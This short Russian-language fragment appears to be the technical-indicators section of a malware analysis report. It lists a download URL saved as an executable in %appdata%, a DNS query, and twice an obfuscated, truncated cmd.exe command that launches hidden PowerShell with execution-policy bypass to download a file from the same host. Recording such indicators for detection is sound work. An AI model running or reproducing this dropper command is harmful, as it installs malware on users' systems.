Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweR^S^hEl^L.^e^X^E -eXEC^UTio^NPo^LiCY ^ByPas^s ^-^n^oPR^O^FilE -^wiNdowSt^Y^lE^ Hi^d^d^e^N (^nEw-o^bjeC^t sYst^E^M^.^Ne^T.WEBClIeN^t).^Do^wnL^o^aDF^ILE('http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "POweR^S^hEl^L.^e^X^E -eXEC^UTio^NPo^LiCY ^ByPas^s ^-^n^oPR^O^FilE -^wiNdowSt^Y^lE^ Hi^d^d^e^N (^nEw-o^bjeC^t sYst^E^M^.^Ne^T.WEBClIeN^t).^Do^wnL^o^aDF^ILE('http://www.fapoerg...' (со скрытым окном)